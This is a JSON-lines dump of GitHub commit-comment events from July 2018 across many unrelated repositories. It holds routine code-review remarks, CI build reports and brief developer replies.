{"id":"8011437676","type":"CommitCommentEvent","actor":{"login":"silverwind"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29816985,"position":6,"line":3141,"path":"github-dark.css","commit_id":"3890d7041a40ede88816e721525bf7c4841113ed","created_at":"2018-07-24T16:46:25Z","updated_at":"2018-07-24T16:46:25Z","author_association":"MEMBER","body":"Missing a `{` here."}},"created_at":"2018-07-24T16:46:25Z"}
{"id":"8011438184","type":"CommitCommentEvent","actor":{"login":"holfordm"},"repo":{"name":"bodleian/medieval-mss"},"payload":{"comment":{"id":29816988,"position":null,"line":null,"path":null,"commit_id":"2b17ac4a7df76777496b290993bd059af68363e9","created_at":"2018-07-24T16:46:30Z","updated_at":"2018-07-24T16:46:30Z","author_association":"COLLABORATOR","body":"fixed. My fault for working on the train with no internet access = no validation!"}},"created_at":"2018-07-24T16:46:30Z"}
{"id":"8011440233","type":"CommitCommentEvent","actor":{"login":"silverwind"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29816993,"position":6,"line":3141,"path":"github-dark.css","commit_id":"3890d7041a40ede88816e721525bf7c4841113ed","created_at":"2018-07-24T16:46:54Z","updated_at":"2018-07-24T16:46:54Z","author_association":"MEMBER","body":"Linter should catch errors like this. Always a good idea to run `grunt lint`."}},"created_at":"2018-07-24T16:46:54Z"}
{"id":"8011444968","type":"CommitCommentEvent","actor":{"login":"yzmw1213"},"repo":{"name":"yzmw1213/helloVue"},"payload":{"comment":{"id":29817002,"position":null,"line":null,"path":null,"commit_id":"398d54d6e785489b6ddf7cfd1d4107885ab07e71","created_at":"2018-07-24T16:47:48Z","updated_at":"2018-07-24T16:47:48Z","author_association":"OWNER","body":"cssの優先度が低い為か、色コードで指定しても効いていません。\r\n"}},"created_at":"2018-07-24T16:47:48Z"}
{"id":"8011445738","type":"CommitCommentEvent","actor":{"login":"salexpdx"},"repo":{"name":"salexpdx/og-aws"},"payload":{"comment":{"id":29817003,"position":null,"line":null,"path":null,"commit_id":"5d65fa431ac56a301db26a955a1cc78b077d6507","created_at":"2018-07-24T16:47:57Z","updated_at":"2018-07-24T16:47:57Z","author_association":"OWNER","body":"It may be worth knowing from historical context.  When I had a T2 instance that used all it's CPU credits, it looked like steal but I was just out of credits. \r\n\r\nOn the physical comment, what I was going after was if you need 22 m4.larges and you buy a dedicated m4 instance and use that.  If that physical hardware needs to be rebooted/upgraded/patched, all 22 of your instances go down at once.  OTOH, if you just bought 22 instances, an underlying hardware maintenance would only affect 1 of those instances and the other 21 would continue fine."}},"created_at":"2018-07-24T16:47:57Z"}
{"id":"8011450051","type":"CommitCommentEvent","actor":{"login":"Treeston"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29817013,"position":null,"line":null,"path":null,"commit_id":"fac470014b4b97060a22c346aadfaf9c03b99ff2","created_at":"2018-07-24T16:48:46Z","updated_at":"2018-07-24T16:48:46Z","author_association":"MEMBER","body":"b7c0f19 added a check to only do the update for far-away units (same as the combat check), fyi"}},"created_at":"2018-07-24T16:48:46Z"}
{"id":"8011453881","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29817019,"position":null,"line":null,"path":null,"commit_id":"a82d00f88723c23435e6d7741ba6b09a13fb1225","created_at":"2018-07-24T16:49:28Z","updated_at":"2018-07-24T16:49:28Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-907](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-907).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-907-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-24T16:49:28Z"}
{"id":"8011455522","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29817020,"position":53,"line":944,"path":"assembl/models/auth.py","commit_id":"f5bdfddf1cd0d8f27506b72acca3671fdaa7cf13","created_at":"2018-07-24T16:49:48Z","updated_at":"2018-07-24T16:49:48Z","author_association":"CONTRIBUTOR","body":"If this is used only for tests, you should move this to simple function in the test file."}},"created_at":"2018-07-24T16:49:48Z"}
{"id":"8011458671","type":"CommitCommentEvent","actor":{"login":"mdmayfield"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29817027,"position":4,"line":144,"path":"src/evdev-mt-touchpad.h","commit_id":"b556ded452d2ba8287d8848c7e454b5df2e12bb9","created_at":"2018-07-24T16:50:23Z","updated_at":"2018-07-24T16:50:23Z","author_association":"OWNER","body":"Good point! At first I thought this wasn't possible with only 3 states, but it's doable if a new touch begins as _NO instead of _MAYBE; see the new commits in this branch.\r\n\r\nThis causes a semantic change for THUMB_STATE_YES, _NO, and _MAYBE. Here, YES means \"branded as a thumb for life\"; NO means \"probably not a thumb but still under scrutiny\" and MAYBE means \"suspicious; not counted as active until it moves past the threshold.\"\r\n\r\nThe version with these changes passes & fails the same tests as before."}},"created_at":"2018-07-24T16:50:23Z"}
{"id":"8011459614","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29817028,"position":null,"line":null,"path":null,"commit_id":"aa2e997b3d72018e95fa8355e30e94298593b6c7","created_at":"2018-07-24T16:50:34Z","updated_at":"2018-07-24T16:50:34Z","author_association":"NONE","body":"issue_#6601_1 (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aa2e997b3d72018e95fa8355e30e94298593b6c7-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-24T16:50:34Z"}
{"id":"8011461083","type":"CommitCommentEvent","actor":{"login":"Octogonapus"},"repo":{"name":"purduesigbots/pros-docs"},"payload":{"comment":{"id":29817030,"position":29,"line":29,"path":"v5/okapi/tutorials/walkthrough/autonomous-movement.rst","commit_id":"cdb3317c9f003ea712f98ad005f2d0d3bc0a2ebd","created_at":"2018-07-24T16:50:49Z","updated_at":"2018-07-24T16:50:49Z","author_association":"COLLABORATOR","body":"Yes. Or if you had a MotorGroup, you could just pass in the initializer_list of port numbers (i.e., `{1, 2}`)."}},"created_at":"2018-07-24T16:50:49Z"}
{"id":"8011461824","type":"CommitCommentEvent","actor":{"login":"Forrygt"},"repo":{"name":"Forrygt/Pipeline"},"payload":{"comment":{"id":29817031,"position":null,"line":null,"path":null,"commit_id":"e89250879dbf0cb4e753c7ebdf2f82caa742f94d","created_at":"2018-07-24T16:50:56Z","updated_at":"2018-07-24T16:50:56Z","author_association":"OWNER","body":"24/07/2018"}},"created_at":"2018-07-24T16:50:56Z"}
{"id":"8011465950","type":"CommitCommentEvent","actor":{"login":"mdmayfield"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29817043,"position":248,"line":1640,"path":"src/evdev-mt-touchpad.c","commit_id":"b556ded452d2ba8287d8848c7e454b5df2e12bb9","created_at":"2018-07-24T16:51:45Z","updated_at":"2018-07-24T16:51:45Z","author_association":"OWNER","body":"I think I fixed this and all the other style & indentation issues; see new commits. I'm just using Pluma (gedit fork) and ninja at the command line so haven't seen warnings... maybe it's time for me to move to some more sophisticated tools!"}},"created_at":"2018-07-24T16:51:45Z"}
{"id":"8011466539","type":"CommitCommentEvent","actor":{"login":"MJavad"},"repo":{"name":"MJavad/electra-plrun"},"payload":{"comment":{"id":29817044,"position":null,"line":null,"path":null,"commit_id":"b31966c4fb1307fd6e152720a6aa62216719eed2","created_at":"2018-07-24T16:51:53Z","updated_at":"2018-07-24T16:51:53Z","author_association":"OWNER","body":"I don’t have a 11.3.1 device to test it.\r\nWhere did you extract bfinject?  There is an issue which prevents it running under /private. Try putting it somwhere else.\r\nIf it doesn’t work, I can try to fix it but I can’t test it."}},"created_at":"2018-07-24T16:51:53Z"}
{"id":"8011469245","type":"CommitCommentEvent","actor":{"login":"matthewbauer"},"repo":{"name":"reflex-frp/reflex-platform"},"payload":{"comment":{"id":29817050,"position":null,"line":null,"path":null,"commit_id":"26289499acd98fcaca410214780238e6247bce4d","created_at":"2018-07-24T16:52:24Z","updated_at":"2018-07-24T16:52:24Z","author_association":"CONTRIBUTOR","body":"This is the log:\r\n\r\nhttps://hydra.reflex-frp.org/build/1188/nixlog/61/tail\r\n\r\nI was just going to see what happens when this is done. It will only break things if something needs the math-functions splices. It is definitely an issue with the patch though and I've reported it to Alp."}},"created_at":"2018-07-24T16:52:24Z"}
{"id":"8011470470","type":"CommitCommentEvent","actor":{"login":"jeanfbrito"},"repo":{"name":"jordanbrock/bootstrap-daterangepicker-rails"},"payload":{"comment":{"id":29817051,"position":null,"line":null,"path":null,"commit_id":"b4b1f2bd2dbbd5b495a2568668ad904403568244","created_at":"2018-07-24T16:52:39Z","updated_at":"2018-07-24T16:52:39Z","author_association":"NONE","body":"This breaks the gem, needs to be \"daterangepicker\" not \"daterangepickers\".\r\nCould you fix this?"}},"created_at":"2018-07-24T16:52:39Z"}
{"id":"8011473045","type":"CommitCommentEvent","actor":{"login":"yungsters"},"repo":{"name":"facebook/fbjs"},"payload":{"comment":{"id":29817055,"position":110,"line":53,"path":"packages/babel-preset-fbjs/plugins/inline-requires.js","commit_id":"5a5351b0872df9e1a5e6bce6838a82986011fdef","created_at":"2018-07-24T16:53:09Z","updated_at":"2018-07-24T16:53:09Z","author_association":"CONTRIBUTOR","body":"Oh, here it is."}},"created_at":"2018-07-24T16:53:09Z"}
{"id":"8011475538","type":"CommitCommentEvent","actor":{"login":"mdmayfield"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29817059,"position":44,"line":1121,"path":"src/evdev-mt-touchpad.c","commit_id":"b556ded452d2ba8287d8848c7e454b5df2e12bb9","created_at":"2018-07-24T16:53:39Z","updated_at":"2018-07-24T16:53:39Z","author_association":"OWNER","body":"Thanks! I think it may still need some refinement of the size & timing. Current WIP = checks for number of touchpad slots, as you mentioned elsewhere."}},"created_at":"2018-07-24T16:53:39Z"}
{"id":"8011478255","type":"CommitCommentEvent","actor":{"login":"thomas-keller"},"repo":{"name":"thomas-keller/TampaUseRs"},"payload":{"comment":{"id":29817065,"position":null,"line":null,"path":null,"commit_id":"c32156924a7c720c5e90ef7a22e5c89289c0c443","created_at":"2018-07-24T16:54:12Z","updated_at":"2018-07-24T16:54:12Z","author_association":"OWNER","body":"Thanks,\r\n\r\nI was trying to reduce the dependency nightmare but obviously didn't get all the way there."}},"created_at":"2018-07-24T16:54:12Z"}
{"id":"8011481196","type":"CommitCommentEvent","actor":{"login":"bigretromike"},"repo":{"name":"ShokoAnime/ShokoServer"},"payload":{"comment":{"id":29817069,"position":null,"line":null,"path":null,"commit_id":"3a560e6f9c74f737e651121d05765de342fe46e9","created_at":"2018-07-24T16:54:45Z","updated_at":"2018-07-24T16:54:45Z","author_association":"CONTRIBUTOR","body":"I wont remove and commit code that is broken for me only (if no one did it its probably that way for reason, and no information about it on git indicate that something is broken on my end ) :+1: "}},"created_at":"2018-07-24T16:54:45Z"}
{"id":"8011482680","type":"CommitCommentEvent","actor":{"login":"whyang0808"},"repo":{"name":"whyang0808/learning-css"},"payload":{"comment":{"id":29817070,"position":null,"line":null,"path":null,"commit_id":"8fe9671813b929898863693aae8b0b6e5234c527","created_at":"2018-07-24T16:55:02Z","updated_at":"2018-07-24T16:55:02Z","author_association":"OWNER","body":"CSS Selectors: [css-selectors.pdf](https://github.com/whyang0808/learning-css/files/2224584/css-selectors.pdf)\r\n"}},"created_at":"2018-07-24T16:55:02Z"}
{"id":"8011485093","type":"CommitCommentEvent","actor":{"login":"ryantrinkle"},"repo":{"name":"reflex-frp/reflex-platform"},"payload":{"comment":{"id":29817072,"position":null,"line":null,"path":null,"commit_id":"26289499acd98fcaca410214780238e6247bce4d","created_at":"2018-07-24T16:55:29Z","updated_at":"2018-07-24T16:55:29Z","author_association":"MEMBER","body":"Ah, makes sense\n\nOn Tue, Jul 24, 2018, 12:52 Matthew Bauer <notifications@github.com> wrote:\n\n> This is the log:\n>\n> https://hydra.reflex-frp.org/build/1188/nixlog/61/tail\n>\n> I was just going to see what happens when this is done. It will only break\n> things if something needs the math-functions splices. It is definitely an\n> issue with the patch though and I've reported it to Alp.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/reflex-frp/reflex-platform/commit/26289499acd98fcaca410214780238e6247bce4d#commitcomment-29817050>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABGlYDdeUO6Hso2NKA4zFnKH5ALf7Bm5ks5uJ1DJgaJpZM4VdE9m>\n> .\n>\n"}},"created_at":"2018-07-24T16:55:29Z"}
{"id":"8011487834","type":"CommitCommentEvent","actor":{"login":"Dog2puppy"},"repo":{"name":"Sleitnick/AeroGameFramework"},"payload":{"comment":{"id":29817078,"position":null,"line":null,"path":null,"commit_id":"4a6b9b73f21738f086210e96fd2077731213a2cd","created_at":"2018-07-24T16:56:02Z","updated_at":"2018-07-24T16:56:02Z","author_association":"NONE","body":"But what about that 1 time that it uses the max amount of retries? Even though it’s unlikely to happen, would that mean the player is stuck with no data? I looked through the module, and all it seems to do is `warn()` if it reaches the max retries. "}},"created_at":"2018-07-24T16:56:02Z"}
{"id":"8011491334","type":"CommitCommentEvent","actor":{"login":"zuurw"},"repo":{"name":"eduardorasgado/recordariumApp"},"payload":{"comment":{"id":29817086,"position":null,"line":null,"path":null,"commit_id":"bd7467b0c38dbea8e88aa375bd0e1ff1f490efac","created_at":"2018-07-24T16:56:42Z","updated_at":"2018-07-24T16:56:42Z","author_association":"NONE","body":"Hi @eduardorasgado  this is the install instructions of this project? you should put this also in english to people that dont understant spanish try to use it :)\r\n\r\nGreetings!"}},"created_at":"2018-07-24T16:56:42Z"}
{"id":"8011495483","type":"CommitCommentEvent","actor":{"login":"Cazzar"},"repo":{"name":"ShokoAnime/ShokoServer"},"payload":{"comment":{"id":29817100,"position":null,"line":null,"path":null,"commit_id":"3a560e6f9c74f737e651121d05765de342fe46e9","created_at":"2018-07-24T16:57:32Z","updated_at":"2018-07-24T16:57:32Z","author_association":"CONTRIBUTOR","body":"... [*cough*](https://github.com/ShokoAnime/ShokoServer/commit/fc44fff121f0625b162100139bb64d0bf8c3b772#diff-2d380449bfedb31e877596fd2eaa4bbfL538)"}},"created_at":"2018-07-24T16:57:32Z"}
{"id":"8011496608","type":"CommitCommentEvent","actor":{"login":"brucegonz92"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29817102,"position":18,"line":26,"path":"app/src/main/res/values/styles.xml","commit_id":"8c9cbfe5c53b2ede38ccb73d81ecbed2bd30fb46","created_at":"2018-07-24T16:57:45Z","updated_at":"2018-07-24T16:57:45Z","author_association":"NONE","body":"Previous suggestion didn't work for me... BUT, getting rid of \"style/\" in \"parent=....\" got it to work"}},"created_at":"2018-07-24T16:57:45Z"}
{"id":"8011497390","type":"CommitCommentEvent","actor":{"login":"abdellahaski"},"repo":{"name":"DMNStage/DMNStageAPI"},"payload":{"comment":{"id":29817104,"position":37,"line":98,"path":"src/main/java/com/dmnstage/api/service/IServiceImp.java","commit_id":"697058e7b64d60a16447fdb4160d2b1f8379ecc3","created_at":"2018-07-24T16:57:55Z","updated_at":"2018-07-24T16:57:55Z","author_association":"COLLABORATOR","body":"3lach matkhdmch hna b setUser z3ma dowz liha user bsifa 3ama kima drna f newuser"}},"created_at":"2018-07-24T16:57:55Z"}
{"id":"8011499845","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29817106,"position":null,"line":null,"path":null,"commit_id":"aa2e997b3d72018e95fa8355e30e94298593b6c7","created_at":"2018-07-24T16:58:23Z","updated_at":"2018-07-24T16:58:23Z","author_association":"NONE","body":"issue_#6601_1 (mjwitte) - x86_64-MacOS-10.9-clang: OK (2945 of 2945 tests passed, 9 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 1 test had: ERR diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aa2e997b3d72018e95fa8355e30e94298593b6c7-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aa2e997b3d72018e95fa8355e30e94298593b6c7-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-24T16:58:23Z"}
{"id":"8011502760","type":"CommitCommentEvent","actor":{"login":"Bruece"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29817113,"position":18,"line":26,"path":"app/src/main/res/values/styles.xml","commit_id":"8c9cbfe5c53b2ede38ccb73d81ecbed2bd30fb46","created_at":"2018-07-24T16:58:59Z","updated_at":"2018-07-24T16:58:59Z","author_association":"NONE","body":"Previous suggestion didn't work for me... BUT, getting rid of \"style/\" in \"parent=....\" got it to work"}},"created_at":"2018-07-24T16:58:59Z"}
{"id":"8011504056","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29817119,"position":null,"line":null,"path":null,"commit_id":"c6f8a96b6b186f7d2c5a600194c61c1c7dec67bd","created_at":"2018-07-24T16:59:15Z","updated_at":"2018-07-24T16:59:15Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-45](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-45).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-45-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-24T16:59:15Z"}
{"id":"8011504714","type":"CommitCommentEvent","actor":{"login":"AryanPatidar"},"repo":{"name":"AryanPatidar/Test_DotOS_vendor"},"payload":{"comment":{"id":29817121,"position":null,"line":null,"path":null,"commit_id":"c82bbfb0e1e4c5d02d51947989cd5f7fb924fd83","created_at":"2018-07-24T16:59:22Z","updated_at":"2018-07-24T16:59:22Z","author_association":"OWNER","body":"I meant System/app\r\n\r\nTypo error"}},"created_at":"2018-07-24T16:59:22Z"}
{"id":"8011504773","type":"CommitCommentEvent","actor":{"login":"bamboo"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29817122,"position":null,"line":null,"path":null,"commit_id":"791680c830cde93708e89aa1660dc8f0c418bf62","created_at":"2018-07-24T16:59:23Z","updated_at":"2018-07-24T16:59:23Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-24T16:59:23Z"}
{"id":"8011506412","type":"CommitCommentEvent","actor":{"login":"tnayanam"},"repo":{"name":"tnayanam/WebApi"},"payload":{"comment":{"id":29817124,"position":null,"line":null,"path":null,"commit_id":"378af8971016a11f6566876dc3e0106ee9436490","created_at":"2018-07-24T16:59:44Z","updated_at":"2018-07-24T16:59:44Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/17131576/43154184-6ea8cb08-8f41-11e8-9f83-be64d9723743.png)\r\n"}},"created_at":"2018-07-24T16:59:44Z"}
{"id":"8011508345","type":"CommitCommentEvent","actor":{"login":"ncharles"},"repo":{"name":"ncharles/rudder-packages"},"payload":{"comment":{"id":29817131,"position":null,"line":null,"path":null,"commit_id":"07ad8d936c12567925a2e9e0e0866d617d1185ce","created_at":"2018-07-24T17:00:09Z","updated_at":"2018-07-24T17:00:09Z","author_association":"OWNER","body":"we need to do some json to get the number of component"}},"created_at":"2018-07-24T17:00:09Z"}
{"id":"8011509037","type":"CommitCommentEvent","actor":{"login":"abdellahaski"},"repo":{"name":"DMNStage/DMNStageAPI"},"payload":{"comment":{"id":29817135,"position":19,"line":68,"path":"src/main/java/com/dmnstage/api/web/RestService.java","commit_id":"697058e7b64d60a16447fdb4160d2b1f8379ecc3","created_at":"2018-07-24T17:00:16Z","updated_at":"2018-07-24T17:00:16Z","author_association":"COLLABORATOR","body":"Safi haka mzzn ri b Manytomany"}},"created_at":"2018-07-24T17:00:16Z"}
{"id":"8011512417","type":"CommitCommentEvent","actor":{"login":"bradfier"},"repo":{"name":"bradfier/tibrv-rs"},"payload":{"comment":{"id":29817139,"position":null,"line":null,"path":null,"commit_id":"d64c803406da76fe4d0608c566e422492b6c306c","created_at":"2018-07-24T17:00:55Z","updated_at":"2018-07-24T17:00:55Z","author_association":"OWNER","body":"@pfernie sorry to bug you, but as \"The other user\" do you have any thoughts on the new API defined on this branch?"}},"created_at":"2018-07-24T17:00:55Z"}
{"id":"8011523205","type":"CommitCommentEvent","actor":{"login":"smrgeoinfo"},"repo":{"name":"ESIPFed/sweet"},"payload":{"comment":{"id":29817151,"position":null,"line":null,"path":null,"commit_id":"b914dea40e88af2f3dbf86b907d82625e1923863","created_at":"2018-07-24T17:03:03Z","updated_at":"2018-07-24T17:03:03Z","author_association":"CONTRIBUTOR","body":"Following instructions at https://github.com/ESIPFed/sweet/blob/master/CONTRIBUTING.md, but tried 'git push upstream ISSUE-85' from Git Windows ( v1.2.6), and it pushed to master in github; the new branch I created locally didn't push.  Revert, tried the push upstream ISSUE-85 from bash and it worked.   Seems like problem in GitWindows, but maybe I'm not understanding exactly what's going on....  Anyway I'm surprised a newbie like me can push to master under any circumstances...."}},"created_at":"2018-07-24T17:03:03Z"}
{"id":"8011526560","type":"CommitCommentEvent","actor":{"login":"FoxMcloud5655"},"repo":{"name":"Cereal-Killa/NEW-NUSGrabberGUI"},"payload":{"comment":{"id":29817160,"position":null,"line":null,"path":null,"commit_id":"eb9473e307da4a789bb5cbdd94ec7bfc74bd5730","created_at":"2018-07-24T17:03:42Z","updated_at":"2018-07-24T17:03:42Z","author_association":"NONE","body":"Wow.  You've changed around quite a bit of code here.  If I'm going to accept this commit, I'm going to have to refactor the code to the way it was before; not using `this.` and not changing the default GUI size without appropriate reason being just a few.\r\n\r\nI'll look into this when I can.  Thanks for your suggestion.  This will probably make it into a new commit by myself and a new official version."}},"created_at":"2018-07-24T17:03:42Z"}
{"id":"8011529655","type":"CommitCommentEvent","actor":{"login":"gadenbuie"},"repo":{"name":"thomas-keller/TampaUseRs"},"payload":{"comment":{"id":29817170,"position":null,"line":null,"path":null,"commit_id":"c32156924a7c720c5e90ef7a22e5c89289c0c443","created_at":"2018-07-24T17:04:21Z","updated_at":"2018-07-24T17:04:21Z","author_association":"NONE","body":"It's all good, that's what I figured so I moved these extra ones I found into \"optional\". Mostly just to help people avoid surprises."}},"created_at":"2018-07-24T17:04:21Z"}
{"id":"8011533158","type":"CommitCommentEvent","actor":{"login":"K-Watt"},"repo":{"name":"K-Watt/Memory_Game"},"payload":{"comment":{"id":29817177,"position":null,"line":null,"path":null,"commit_id":"d6af041599feba848673c085c6b61c86e54330cd","created_at":"2018-07-24T17:05:01Z","updated_at":"2018-07-24T17:05:01Z","author_association":"OWNER","body":"Wrong push message, only removed  toggleModal(); "}},"created_at":"2018-07-24T17:05:01Z"}
{"id":"8011538053","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29817187,"position":null,"line":null,"path":null,"commit_id":"f2b82a393f856881e89f7af8557d0296439e172c","created_at":"2018-07-24T17:05:56Z","updated_at":"2018-07-24T17:05:56Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/95/display/redirect) (on internal Jenkins) failed in stage 'Test run' 🔥 : hudson.AbortException: script returned exit code 2\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/95//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/f2b82a393f856881e89f7af8557d0296439e172c/95/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/f2b82a393f856881e89f7af8557d0296439e172c/95/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/f2b82a393f856881e89f7af8557d0296439e172c/95/jenkins-results/generator-diff/index.html) (only version changes)\n🔥 [Test run failed](http://xamarin-storage/jenkins/xamarin-macios/xcode10/f2b82a393f856881e89f7af8557d0296439e172c/95/jenkins-results/tests/index.html) 🔥\n\n# Test results\n\n1 tests failed, 160 tests passed.\n\n## Failed tests\n\n * MSBuild tests/iOS: TimedOut (Execution timed out after 0 minutes.)\n"}},"created_at":"2018-07-24T17:05:56Z"}
{"id":"8011541159","type":"CommitCommentEvent","actor":{"login":"98otiss03"},"repo":{"name":"SunTheCourier/Splatoon-2-Meme-ROM-hack"},"payload":{"comment":{"id":29817189,"position":null,"line":null,"path":null,"commit_id":"02ec53fdbf1033b1852c7c40e4e77b7510a1231c","created_at":"2018-07-24T17:06:33Z","updated_at":"2018-07-24T17:06:33Z","author_association":"NONE","body":"."}},"created_at":"2018-07-24T17:06:33Z"}
{"id":"8011542991","type":"CommitCommentEvent","actor":{"login":"pakrym"},"repo":{"name":"aspnet/IISIntegration"},"payload":{"comment":{"id":29817195,"position":39,"line":61,"path":"src/Microsoft.AspNetCore.Server.IntegrationTesting.IIS/IISDeployerBase.cs","commit_id":"3e39ca2f8004ad5852d911c676dd486803c8a1fd","created_at":"2018-07-24T17:06:55Z","updated_at":"2018-07-24T17:06:55Z","author_association":"CONTRIBUTOR","body":"Add?"}},"created_at":"2018-07-24T17:06:55Z"}
{"id":"8011547333","type":"CommitCommentEvent","actor":{"login":"simulacion4"},"repo":{"name":"simulacion4/trabajosimulacion"},"payload":{"comment":{"id":29817203,"position":null,"line":null,"path":null,"commit_id":"913fdf59df15a237a5cf98dc0efec9974d8ae78d","created_at":"2018-07-24T17:07:48Z","updated_at":"2018-07-24T17:07:48Z","author_association":"OWNER","body":"Librería de Arrduini"}},"created_at":"2018-07-24T17:07:48Z"}
{"id":"8011548037","type":"CommitCommentEvent","actor":{"login":"whyang0808"},"repo":{"name":"whyang0808/learning-css"},"payload":{"comment":{"id":29817206,"position":null,"line":null,"path":null,"commit_id":"921d3cea67e3e134e9338cee183de23daf425604","created_at":"2018-07-24T17:07:56Z","updated_at":"2018-07-24T17:07:56Z","author_association":"OWNER","body":"CSS Specificity: [css-specificity.pdf](https://github.com/whyang0808/learning-css/files/2224615/css-specificity.pdf)\r\n"}},"created_at":"2018-07-24T17:07:56Z"}
{"id":"8011548576","type":"CommitCommentEvent","actor":{"login":"AryanPatidar"},"repo":{"name":"AryanPatidar/Test_DotOS_device"},"payload":{"comment":{"id":29817209,"position":null,"line":null,"path":null,"commit_id":"3809068f7c4b9b3b04bdc12847c83c0ce0dc94ed","created_at":"2018-07-24T17:08:03Z","updated_at":"2018-07-24T17:08:03Z","author_association":"OWNER","body":"*Removed"}},"created_at":"2018-07-24T17:08:03Z"}
{"id":"8011551511","type":"CommitCommentEvent","actor":{"login":"bamboo"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29817218,"position":null,"line":null,"path":null,"commit_id":"43cb6fa23b767b1615b9060c0b71b63c4530d65b","created_at":"2018-07-24T17:08:36Z","updated_at":"2018-07-24T17:08:36Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-24T17:08:36Z"}
{"id":"8011562083","type":"CommitCommentEvent","actor":{"login":"auvipy"},"repo":{"name":"chibisov/drf-extensions"},"payload":{"comment":{"id":29817239,"position":null,"line":null,"path":null,"commit_id":"00712396be979aaa5a86246bee39284b5e5e8d71","created_at":"2018-07-24T17:10:40Z","updated_at":"2018-07-24T17:10:40Z","author_association":"COLLABORATOR","body":"allow me some time."}},"created_at":"2018-07-24T17:10:40Z"}
{"id":"8011563552","type":"CommitCommentEvent","actor":{"login":"mivade"},"repo":{"name":"pennmem/brain_viz_unity"},"payload":{"comment":{"id":29817242,"position":6,"line":6,"path":"README.md","commit_id":"5fe4d11df6a9f8f815b6bec0fe3adfb6c6d5e279","created_at":"2018-07-24T17:10:56Z","updated_at":"2018-07-24T17:10:56Z","author_association":"NONE","body":"Can you elaborate on this?"}},"created_at":"2018-07-24T17:10:56Z"}
{"id":"8011564953","type":"CommitCommentEvent","actor":{"login":"mivade"},"repo":{"name":"pennmem/brain_viz_unity"},"payload":{"comment":{"id":29817244,"position":7,"line":7,"path":"README.md","commit_id":"5fe4d11df6a9f8f815b6bec0fe3adfb6c6d5e279","created_at":"2018-07-24T17:11:12Z","updated_at":"2018-07-24T17:11:12Z","author_association":"NONE","body":"Hints about where to find this folder?"}},"created_at":"2018-07-24T17:11:12Z"}
{"id":"8011565915","type":"CommitCommentEvent","actor":{"login":"bamboo"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29817245,"position":38,"line":38,"path":"subprojects/docs/src/docs/userguide/userguide.adoc","commit_id":"ec31973af72608ef4527d9d6e2f37d047969ff9b","created_at":"2018-07-24T17:11:23Z","updated_at":"2018-07-24T17:11:23Z","author_association":"MEMBER","body":":x: _download and install Gradle_ link is broken"}},"created_at":"2018-07-24T17:11:23Z"}
